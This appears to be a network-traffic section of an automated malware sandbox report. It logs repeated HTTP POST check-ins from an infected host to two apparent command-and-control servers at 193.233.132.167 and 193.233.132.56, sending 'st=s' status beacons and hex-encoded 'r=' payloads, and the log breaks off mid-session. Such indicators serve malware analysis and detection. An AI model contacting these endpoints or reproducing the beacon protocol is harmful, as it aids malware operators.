                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.821990013 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1564192.168.2.551421193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.642147064 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.895287037 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1565192.168.2.551422193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.141503096 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.390805960 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1566192.168.2.551423193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.227164984 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.473256111 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1567192.168.2.551424193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.642395020 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.893414974 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1568192.168.2.551425193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.721116066 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:09.969913006 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1569192.168.2.551426193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.211538076 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.458998919 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1570192.168.2.551427193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.304650068 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.553359985 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1571192.168.2.551428193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.702375889 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.944757938 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1572192.168.2.551429193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:10.799377918 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.044140100 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1573192.168.2.551430193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.275806904 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.523113012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1574192.168.2.551431193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.374311924 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.626435041 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1575192.168.2.551432193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.775744915 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.024138927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1576192.168.2.551433193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:11.877244949 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.130733013 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1577192.168.2.551434193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.359199047 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.608380079 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1578192.168.2.551435193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.461499929 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.705215931 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1579192.168.2.551436193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.863676071 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.123030901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1580192.168.2.551437193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:12.953463078 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
